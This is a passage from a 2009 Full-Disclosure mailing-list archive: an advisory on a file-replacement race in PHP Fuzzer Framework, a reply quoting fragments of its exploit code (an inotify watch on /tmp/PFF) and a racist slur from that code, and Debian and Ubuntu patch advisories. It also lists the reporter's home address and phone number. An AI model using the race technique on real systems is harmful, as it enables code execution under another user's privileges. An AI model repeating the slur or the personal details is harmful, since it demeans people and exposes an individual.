an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (MingW32) - WinPT 1.2.0 iD8DBQFKd3Mm9EOAcmTuFN0RAsvtAKCy63s4g+vP3NMNgY/cH3Yk7IJXhwCdFxkI x3i+U89DFXpEf/UHUalXsnc= =D60y -----END PGP SIGNATURE----- From elliot_mb at hushmail.com Mon Aug 3 19:48:29 2009 From: elliot_mb at hushmail.com (elliot_mb at hushmail.com) Date: Mon, 03 Aug 2009 14:48:29 -0400 Subject: [Full-disclosure] PHP Fuzzer Framework Insecure File Creation/Execution Vulnerability Message-ID: <20090803184829.2A0D8B8046@smtp.hushmail.com> PHP Fuzzer Framework Insecure File Creation/Execution Vulnerability I. BACKGROUND PFF is a popular fuzzing suite developed by a team of highly skilled developers at a classified government funded information security research center. http://www.setec.org/~calcite/code/pff/ II. DESCRIPTION Local exploitation of an insecure file creation method allows an attacker to execute arbritrary code with the privileges of the user running the affected application. III. ANALYSIS PFF uses a default location for output files before execution by the php intepreter. This location can be owned by another user. An attacker can then use the time between creation of the output file and execution of the file by the php binary to replace the file with a one containing the attacker's payload. IV. DETECTION All versions are affected. V. WORKAROUND Use a location not writable by another user for storage of PFF output files. VI. VENDOR RESPONSE Vendor was uninterested in fixing the issue. VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has not yet assigned an identifier to this issue. VIII. DISCLOSURE TIMELINE 07/30/2009 10:01PM EST - Initial Contact 07/30/2009 10:05PM EST - Initial Vendor Reply 07/30/2009 10:06PM EST - Vendor expressed lack of interest in fixing the issue. IX. CREDIT This vulnerability was discovered by abad1dea, Melissa Elliott Email: Elliott_mb at students.lynchburg.edu melissa at netric.org Address: 408 Homestead Drive Forest, VA 24551 Box 2073 Lynchburg Edu Phone: (434) 610-3058 544-8967 Web: http://www.0xabad1dea.net IRC: irc.smashthestack.org/#social/esper --- Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ -------------- next part -------------- A non-text attachment was scrubbed... Name: cheddabay.c Type: text/x-c Size: 1530 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090803/9668e3ad/attachment.bin From white at debian.org Tue Aug 4 09:57:58 2009 From: white at debian.org (Steffen Joeris) Date: Tue, 4 Aug 2009 18:57:58 +1000 (EST) Subject: [Full-disclosure] [SECURITY] [DSA 1850-1] New libmodplug packages fix arbitrary code execution Message-ID: <20090804085758.8EF39848790@hannah.localdomain> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1850-1 security at debian.org http://www.debian.org/security/ Steffen Joeris August 04, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : libmodplug Vulnerability : several Problem type : local (remote) Debian-specific: no CVE Ids : CVE-2009-1438 CVE-2009-1513 Debian Bugs : 526657 527076 526084 Several vulnerabilities have been discovered in libmodplug, the shared libraries for mod music based on ModPlug. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2009-1438 It was discovered that libmodplug is prone to an integer overflow when processing a MED file with a crafted song comment or song name. CVE-2009-1513 It was discovered that libmodplug is prone to a buffer overflow in the PATinst function, when processing a long instrument name. For the stable distribution (lenny), these problems have been fixed in version 1:0.8.4-1+lenny1. For the oldstable distribution (etch), these problems have been fixed in version 1:0.7-5.2+etch1. For the testing distribution (squeeze) and the unstable distribution (sid), this problem has been fixed in version 1:0.8.7-1. We recommend that you upgrade your libmodplug packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Debian (oldstable) - ------------------ Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/libm/libmodplug/libmodplug_0.7.orig.tar.gz Size/MD5 checksum: 329398 b6e7412f90cdd4a27a2dd3de94909905 http://security.debian.org/pool/updates/main/libm/libmodplug/libmodplug_0.7-5.2+etch1.diff.gz Size/MD5 checksum: 8039 bbab9bd58551171e2e06667a34c142c6 http://security.debian.org/pool/updates/main/libm/libmodplug/libmodplug_0.7-5.2+etch1.dsc Size/MD5 checksum: 639 d1038e62643d55d6f828cf35b79de0b8 Architecture independent packages: http://security.debian.org/pool/updates/main/libm/libmodplug/libmodplug-dev_0.7-5.2+etch1_all.deb Size/MD5 checksum: 22662 4f1054f141eed8596aef8c3ee9cb53e0 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/libm/libmodplug/libmodplug0c2_0.7-5.2+etch1_alpha.deb Size/MD5 checksum: 164658 66dcec99183876eb3d51ef21f94074c3 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/libm/libmodplug/libmodplug0c2_0.7-5.2+etch1_amd64.deb Size/MD5 checksum: 116020 51d8c8c88ca40f4bb84db1e19212d22f arm architecture (ARM) http://security.debian.org/pool/updates/main/libm/libmodplug/libmodplug0c2_0.7-5.2+etch1_arm.deb Size/MD5 checksum: 128564 abea81a9204331d379d19266ae9c2ce4 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/libm/libmodplug/libmodplug0c2_0.7-5.2+etch1_hppa.deb Size/MD5 checksum: 140852 e7123f04da964f983c470e0e8b45541f i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/libm/libmodplug/libmodplug0c2_0.7-5.2+etch1_i386.deb Size/MD5 checksum: 118570 3daea649fff6afd586e038c2e1adefbf ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/libm/libmodplug/libmodplug0c2_0.7-5.2+etch1_ia64.deb Size/MD5 checksum: 193278 66a63c49a06104bfb6e2a433b3965cd6 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/libm/libmodplug/libmodplug0c2_0.7-5.2+etch1_mips.deb Size/MD5 checksum: 128172 437a45a7f44be2ef5d0427a8d48ca3a3 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/libm/libmodplug/libmodplug0c2_0.7-5.2+etch1_mipsel.deb Size/MD5 checksum: 126328 b1e89e5a36757efa0872218ef65aac97 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/libm/libmodplug/libmodplug0c2_0.7-5.2+etch1_powerpc.deb Size/MD5 checksum: 125400 3832485316da7189f10a92ee9a5b9631 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/libm/libmodplug/libmodplug0c2_0.7-5.2+etch1_s390.deb Size/MD5 checksum: 128602 ea7389863995e8c6637aaff4a1451449 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/libm/libmodplug/libmodplug0c2_0.7-5.2+etch1_sparc.deb Size/MD5 checksum: 123960 19482ae9a363ee1c4eace02781bbdf16 Debian GNU/Linux 5.0 alias lenny - -------------------------------- Debian (stable) - --------------- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/libm/libmodplug/libmodplug_0.8.4-1+lenny1.dsc Size/MD5 checksum: 1060 a36f490b6a4e963775577e175b23dd59 http://security.debian.org/pool/updates/main/libm/libmodplug/libmodplug_0.8.4-1+lenny1.diff.gz Size/MD5 checksum: 8031 d8e0a3b87cf946c99641103741f47e35 http://security.debian.org/pool/updates/main/libm/libmodplug/libmodplug_0.8.4.orig.tar.gz Size/MD5 checksum: 510758 091bd1168a524a4f36fc61f95209e7e4 Architecture independent packages: http://security.debian.org/pool/updates/main/libm/libmodplug/libmodplug-dev_0.8.4-1+lenny1_all.deb Size/MD5 checksum: 24776 553b9aa5cddc17736613b981924c3022 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/libm/libmodplug/libmodplug0c2_0.8.4-1+lenny1_alpha.deb Size/MD5 checksum: 253172 d4531bd79e7073ac5910d7bb0afed53b amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/libm/libmodplug/libmodplug0c2_0.8.4-1+lenny1_amd64.deb Size/MD5 checksum: 173448 f78dd0d43b1dfcc5f7fbce292bfbf4fb arm architecture (ARM) http://security.debian.org/pool/updates/main/libm/libmodplug/libmodplug0c2_0.8.4-1+lenny1_arm.deb Size/MD5 checksum: 186076 af4e4880d2a5fe3173f7ecad4a4f6e10 armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/libm/libmodplug/libmodplug0c2_0.8.4-1+lenny1_armel.deb Size/MD5 checksum: 182470 3ebd0c108b3a223e46996f54a12a5067 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/libm/libmodplug/libmodplug0c2_0.8.4-1+lenny1_i386.deb Size/MD5 checksum: 171752 6b198e2b26666d92c59bac1eaf6dfd04 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/libm/libmodplug/libmodplug0c2_0.8.4-1+lenny1_ia64.deb Size/MD5 checksum: 321748 9d771a479ddb9cc4338a47617c21e4aa mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/libm/libmodplug/libmodplug0c2_0.8.4-1+lenny1_mips.deb Size/MD5 checksum: 186890 6d44ee961d8c5e2b4477a6ff12111b99 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/libm/libmodplug/libmodplug0c2_0.8.4-1+lenny1_mipsel.deb Size/MD5 checksum: 185528 96d30ac3d8a55068e9ad2d065f3831ba powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/libm/libmodplug/libmodplug0c2_0.8.4-1+lenny1_powerpc.deb Size/MD5 checksum: 187332 f0151664a380507749527c06f398ba63 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/libm/libmodplug/libmodplug0c2_0.8.4-1+lenny1_s390.deb Size/MD5 checksum: 190242 fe35d852302407bbfb538c09d213790b sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/libm/libmodplug/libmodplug0c2_0.8.4-1+lenny1_sparc.deb Size/MD5 checksum: 187802 b54d03502f1c783431c3ee8cfc03274c These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkp397cACgkQ62zWxYk/rQeQuACgjS0eINg6zTd87Z3Ui3aU5BTC q+gAn2tee7yi4zK80mOKOcbovkxs0CSI =oKRx -----END PGP SIGNATURE----- From Valdis.Kletnieks at vt.edu Tue Aug 4 16:09:46 2009 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Tue, 04 Aug 2009 11:09:46 -0400 Subject: [Full-disclosure] PHP Fuzzer Framework Insecure File Creation/Execution Vulnerability In-Reply-To: Your message of "Mon, 03 Aug 2009 16:03:13 EDT." <20090803200313.96A66B8044@smtp.hushmail.com> References: <20090803200313.96A66B8044@smtp.hushmail.com> Message-ID: <13760.1249398586@turing-police.cc.vt.edu> On Mon, 03 Aug 2009 16:03:13 EDT, elliot_mb at hushmail.com said: > VI. VENDOR RESPONSE > > Vendor was uninterested in fixing the issue. Probably because PFF is usually run from a laptop or single-user workstation, and you need a shell on the system already for this exploit to work. So it's really not a big deal unless you're an insider who shouldn't have been trusted with an account on the machine in question, or you've also got *another* way to get access to the box. > #include > struct inotify_event e; > n = inotify_init(); > w = inotify_add_watch(n, "/tmp/PFF", IN_CREATE); Bonus points for using inotify.. but... > * DONT HIRE NIGGERS, THEY BRING ONLY FAILURE. Oddly enough, the guys in charge who brought the South a loss were all white... -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090804/e867faa1/attachment.bin From jamie at canonical.com Tue Aug 4 22:23:07 2009 From: jamie at canonical.com (Jamie Strandboge) Date: Tue, 4 Aug 2009 16:23:07 -0500 Subject: [Full-disclosure] [USN-810-1] NSS vulnerabilities Message-ID: <20090804212307.GA18082@severus.strandboge.com> =========================================================== Ubuntu Security Notice USN-810-1 August 04, 2009 nss vulnerabilities CVE-2009-2404, CVE-2009-2408, CVE-2009-2409 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.04 LTS: libnss3-1d 3.12.3.1-0ubuntu0.8.04.1 Ubuntu 8.10: libnss3-1d 3.12.3.1-0ubuntu0.8.10.1 Ubuntu 9.04: libnss3-1d 3.12.3.1-0ubuntu0.9.04.1 After a standard system upgrade you need to restart an applications that use NSS, such as Firefox, to effect the necessary changes. Details follow: Moxie Marlinspike discovered that NSS did not properly handle regular expressions in certificate names. A remote attacker could create a specially crafted certificate to cause a denial of service (via application crash) or execute arbitrary code as the user invoking the program. (CVE-2009-2404) Moxie Marlinspike and Dan Kaminsky independently discovered that NSS did not properly handle certificates with NULL characters in the certificate name. An attacker could exploit this to perform a man in the middle attack to view sensitive information or alter encrypted communications. (CVE-2009-2408) Dan Kaminsky discovered NSS would still accept certificates with MD2 hash signatures. As a result, an attacker could potentially create a malicious trusted certificate to impersonate another site. (CVE-2009-2409) Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.3.1-0ubuntu0.8.04.1.diff.gz Size/MD5: 37286 f4041d128d758f5506197b1cf0f1214f http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.3.1-0ubuntu0.8.04.1.dsc Size/MD5: 2012 401475ce9f7efa228d7b61671aa69c11 http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.3.1.orig.tar.gz Size/MD5: 5316068 cc5607243fdfdbc80ebbbf6dbb33f784 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-0d_3.12.3.1-0ubuntu0.8.04.1_amd64.deb Size/MD5: 18232 49a5581a19be7771ecdc65fb943e86d7 http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d-dbg_3.12.3.1-0ubuntu0.8.04.1_amd64.deb Size/MD5: 3166090 074734f6e0fd51257999bdc0e38010f3 http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d_3.12.3.1-0ubuntu0.8.04.1_amd64.deb Size/MD5: 1147016 ddc8dfd4f0cc77c129c5bb4b18b6612c http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-dev_3.12.3.1-0ubuntu0.8.04.1_amd64.deb Size/MD5: 257780 f6d735c7c95478fe2992178e0d7781d4 http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-tools_3.12.3.1-0ubuntu0.8.04.1_amd64.deb Size/MD5: 312528 05d78cad52b8c5464350c9b191528e0e i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-0d_3.12.3.1-0ubuntu0.8.04.1_i386.deb Size/MD5: 18200 2c088a165372b431416a5b6d9f54b80b http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d-dbg_3.12.3.1-0ubuntu0.8.04.1_i386.deb Size/MD5: 3012554 50978f6f10b9f4c3918822d864d41aed http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d_3.12.3.1-0ubuntu0.8.04.1_i386.deb Size/MD5: 1040016 f0a52f96bd4f7bb7d8001b7ca5ace8d0 http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-dev_3.12.3.1-0ubuntu0.8.04.1_i386.deb Size/MD5: 254880 c2151ff8a86f4119fcefa1f6c9ee7add http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-tools_3.12.3.1-0ubuntu0.8.04.1_i386.deb Size/MD5: 295096 f6fde2292ca35df9e6cac822d158e512 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/n/nss/libnss3-0d_3.12.3.1-0ubuntu0.8.04.1_lpia.deb Size/MD5: 18190 cbc624cedbae82a39d3c47aaa8ffee38 http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.3.1-0ubuntu0.8.04.1_lpia.deb Size/MD5: 3041822 533fda14ea785417cababc58419a8fec http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.3.1-0ubuntu0.8.04.1_lpia.deb Size/MD5: 1016224 1ed477ec2ffe3ac642cb7c29413842ab http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.3.1-0ubuntu0.8.04.1_lpia.deb Size/MD5: 253574 b9756509dcdeea8433a0f6bbe2dc27b7 http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.12.3.1-0ubuntu0.8.04.1_lpia.deb Size/MD5: 292466 55f2cf8c33f19f17cae613aca3ce71c1 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/n/nss/libnss3-0d_3.12.3.1-0ubuntu0.8.04.1_powerpc.deb Size/MD5: 20678 a26907dda711e1d13e8d597bee4689e0 http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.3.1-0ubuntu0.8.04.1_powerpc.deb Size/MD5: 3125800 102117180150342cecff38e653963f66 http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.3.1-0ubuntu0.8.04.1_powerpc.deb Size/MD5: 1143852 f96cab41f4bf24cf4fa4686b3a963464 http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.3.1-0ubuntu0.8.04.1_powerpc.deb Size/MD5: 256600 e19a891112bea8df4f27fe569da9c951 http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.12.3.1-0ubuntu0.8.04.1_powerpc.deb Size/MD5: 324934 9aaac74bc3f6ec7f990f78d556c5ec09 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/n/nss/libnss3-0d_3.12.3.1-0ubuntu0.8.04.1_sparc.deb Size/MD5: 18292 7e17d87ea08f93759ed7784705d82453 http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.3.1-0ubuntu0.8.04.1_sparc.deb Size/MD5: 2834720 02b6284e651dcf2e6556378dcb730689 http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.3.1-0ubuntu0.8.04.1_sparc.deb Size/MD5: 1019944 ee1829f9195609b3912994fc76788243 http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.3.1-0ubuntu0.8.04.1_sparc.deb Size/MD5: 251578 09583a51b0814b53959af6d79a1b4f8c http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.12.3.1-0ubuntu0.8.04.1_sparc.deb Size/MD5: 299484 0d12ed86aae10c56300bd7cefb2884ef Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.3.1-0ubuntu0.8.10.1.diff.gz Size/MD5: 32769 d4e1fb5ca38687ad1e7532c457febc11 http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.3.1-0ubuntu0.8.10.1.dsc Size/MD5: 2012 f98ccd513ae480ac7b56d7a4793758d3 http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.3.1.orig.tar.gz Size/MD5: 5316068 cc5607243fdfdbc80ebbbf6dbb33f784 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d-dbg_3.12.3.1-0ubuntu0.8.10.1_amd64.deb Size/MD5: 3310610 9f8e4b95d1019e3956a88745ce3888c4 http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d_3.12.3.1-0ubuntu0.8.10.1_amd64.deb Size/MD5: 1195070 21daa67a1f51cc4a942e41beb2da001f http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-dev_3.12.3.1-0ubuntu0.8.10.1_amd64.deb Size/MD5: 257586 89d972c2b67679eca265abac76d0687d http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-0d_3.12.3.1-0ubuntu0.8.10.1_amd64.deb Size/MD5: 18296 8c1d95902c4f0e85c47a3ca941f0b48a http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-tools_3.12.3.1-0ubuntu0.8.10.1_amd64.deb Size/MD5: 317026 11f10cc940951638cf5cac0e6e2f7ded i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d-dbg_3.12.3.1-0ubuntu0.8.10.1_i386.deb Size/MD5: 3137262 2ae6e2fa5e934a5fa27e14cedcdc74b6 http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d_3.12.3.1-0ubuntu0.8.10.1_i386.deb Size/MD5: 1076898 59318f3e92b12686695704ef33074dc0 http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-dev_3.12.3.1-0ubuntu0.8.10.1_i386.deb Size/MD5: 254686 b0dc3ec378ea87afff4a6d46fafca34f http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-0d_3.12.3.1-0ubuntu0.8.10.1_i386.deb Size/MD5: 18248 7a86d451f0cc722f66ca51f9894c81e2 http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-tools_3.12.3.1-0ubuntu0.8.10.1_i386.deb Size/MD5: 300214 88f4442427f4ad5b1e507f24a872d7d5 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.3.1-0ubuntu0.8.10.1_lpia.deb Size/MD5: 3173686 65714f22fc4908727cd58fa917cff249 http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.3.1-0ubuntu0.8.10.1_lpia.deb Size/MD5: 1050748 c55a36fa65b311364ddfc5f9bcacc3e9 http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.3.1-0ubuntu0.8.10.1_lpia.deb Size/MD5: 253226 0b49775e55163a5c6fa22fba288eded7 http://ports.ubuntu.com/pool/universe/n/nss/libnss3-0d_3.12.3.1-0ubuntu0.8.10.1_lpia.deb Size/MD5: 18220 8fd881d7744299014a919437d9edaf87 http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.12.3.1-0ubuntu0.8.10.1_lpia.deb Size/MD5: 296154 fce2927b08d43ba6d2188bf927dfb4d6 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.3.1-0ubuntu0.8.10.1_powerpc.deb Size/MD5: 3284430 e411ebc5e3848a9a28fdb7bcf55af833 http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.3.1-0ubuntu0.8.10.1_powerpc.deb Size/MD5: 1165792 f6a9ba644f3fb0cd888bf4b425522633 http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.3.1-0ubuntu0.8.10.1_powerpc.deb Size/MD5: 256434 19a95ab61e462058ecaf05cbebd11c8a http://ports.ubuntu.com/pool/universe/n/nss/libnss3-0d_3.12.3.1-0ubuntu0.8.10.1_powerpc.deb Size/MD5: 20666 abe014ba1940180af1051006e4d293fd http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.12.3.1-0ubuntu0.8.10.1_powerpc.deb Size/MD5: 320710 0f3c730279a7e731e72986d15fa2fcc2 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.3.1-0ubuntu0.8.10.1_sparc.deb Size/MD5: 2942578 3d396922de5283db749fd41036403ead http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.3.1-0ubuntu0.8.10.1_sparc.deb Size/MD5: 1038356 9d291947a8ef7d02c8c1a9746c1309d4 http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.3.1-0ubuntu0.8.10.1_sparc.deb Size/MD5: 251226 c09de8036a434e93488b5c1b77108246 http://ports.ubuntu.com/pool/universe/n/nss/libnss3-0d_3.12.3.1-0ubuntu0.8.10.1_sparc.deb Size/MD5: 18380 0d18623f50973af22fd4e44e0d042bf4 http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.12.3.1-0ubuntu0.8.10.1_sparc.deb Size/MD5: 301438 430f4a9aef7a540fac80629656572ea9 Updated packages for Ubuntu 9.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.3.1-0ubuntu0.9.04.1.diff.gz Size/MD5: 35980 b64ec10add3d7fbbc7335b0f85b9fb00 http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.3.1-0ubuntu0.9.04.1.dsc Size/MD5: 2012 a889688996d5530e8bf1eb181683137e http://security.ubuntu.com/ubuntu/pool/main/n/nss/nss_3.12.3.1.orig.tar.gz Size/MD5: 5316068 cc5607243fdfdbc80ebbbf6dbb33f784 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d-dbg_3.12.3.1-0ubuntu0.9.04.1_amd64.deb Size/MD5: 3309788 d48afcfa4139fe94b4c0af67c8d9c850 http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d_3.12.3.1-0ubuntu0.9.04.1_amd64.deb Size/MD5: 1196740 7ace44202680241529edaeb226d0dec1 http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-dev_3.12.3.1-0ubuntu0.9.04.1_amd64.deb Size/MD5: 258240 54d581c61ba7608526790263545e1b1c http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-0d_3.12.3.1-0ubuntu0.9.04.1_amd64.deb Size/MD5: 17404 bfbb39c275bb15dcef644991c6af7e7b http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-tools_3.12.3.1-0ubuntu0.9.04.1_amd64.deb Size/MD5: 317668 9d55ed9607359667cf963e04ccb834d5 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d-dbg_3.12.3.1-0ubuntu0.9.04.1_i386.deb Size/MD5: 3137602 af5d5d420c440bf53de79f8952ee17d0 http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d_3.12.3.1-0ubuntu0.9.04.1_i386.deb Size/MD5: 1078336 706162a5436e733e4ce57d51baf163fb http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-dev_3.12.3.1-0ubuntu0.9.04.1_i386.deb Size/MD5: 255338 140b54235689f93baa3971add5401a42 http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-0d_3.12.3.1-0ubuntu0.9.04.1_i386.deb Size/MD5: 17412 fb6ca266988f45378c41455fa5207a85 http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-tools_3.12.3.1-0ubuntu0.9.04.1_i386.deb Size/MD5: 300808 7b06b74c327641634d4f8f1f61b7d432 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.3.1-0ubuntu0.9.04.1_lpia.deb Size/MD5: 3171676 ad44dc80ef0066d3da2edede234b0210 http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.3.1-0ubuntu0.9.04.1_lpia.deb Size/MD5: 1052136 727ab68dd03bec2ae01b4611c5f98309 http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.3.1-0ubuntu0.9.04.1_lpia.deb Size/MD5: 253840 15198ca066b229b42ced8cb5f4307a53 http://ports.ubuntu.com/pool/universe/n/nss/libnss3-0d_3.12.3.1-0ubuntu0.9.04.1_lpia.deb Size/MD5: 17408 fdf85ab9c62a3d3999d4f49bf0172243 http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.12.3.1-0ubuntu0.9.04.1_lpia.deb Size/MD5: 296796 ecc392b5e6b2b2b5b5ef6d9f93f3ad30 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.3.1-0ubuntu0.9.04.1_powerpc.deb Size/MD5: 3282216 5399927c4f40c9369fcb58d3038cc3ec http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.3.1-0ubuntu0.9.04.1_powerpc.deb Size/MD5: 1167866 477cd3a3cb2ec7c5cf791208e096de93 http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.3.1-0ubuntu0.9.04.1_powerpc.deb Size/MD5: 257080 85844f856588609fba74ec37044f9c35 http://ports.ubuntu.com/pool/universe/n/nss/libnss3-0d_3.12.3.1-0ubuntu0.9.04.1_powerpc.deb Size/MD5: 17410 98059af1adbd24026a4dab4faa27ddd1 http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.12.3.1-0ubuntu0.9.04.1_powerpc.deb Size/MD5: 321372 b7afef4b3c7dc27dceb12668458629d8 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.3.1-0ubuntu0.9.04.1_sparc.deb Size/MD5: 2942004 2e8c7c62ef1119b9326564fe50389b8d http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.3.1-0ubuntu0.9.04.1_sparc.deb Size/MD5: 1039416 ad6d7c7f3a2301c7e46a1102098fdbaf 